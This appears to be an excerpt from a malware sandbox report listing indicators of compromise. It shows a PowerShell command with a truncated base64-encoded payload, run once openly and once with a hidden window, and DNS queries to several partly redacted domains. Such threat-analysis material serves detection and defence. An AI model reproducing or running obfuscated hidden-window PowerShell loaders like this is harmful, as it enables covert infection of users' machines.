Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAHQAdAByAGoAYgB1AGEAdQBwAD0AJwBFAHkAZwBpAHIAeQByAGYAdABvAHAAdwAnADsAJABYAG8AcgBlAGsAYwBkAHgAbABqAG...
- DNS ASK es###ehir3d.com
- DNS ASK in#####pp.herokuapp.com
- DNS ASK be####ulated.com
- DNS ASK zh###meng.net
- DNS ASK as####calgary.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABSAHQAdAByAGoAYgB1AGEAdQBwAD0AJwBFAHkAZwBpAHIAeQByAGYAdABvAHAAdwAnADsAJABYAG8AcgBlAGsAYwBkAHgAbABqAG...' (with hidden window)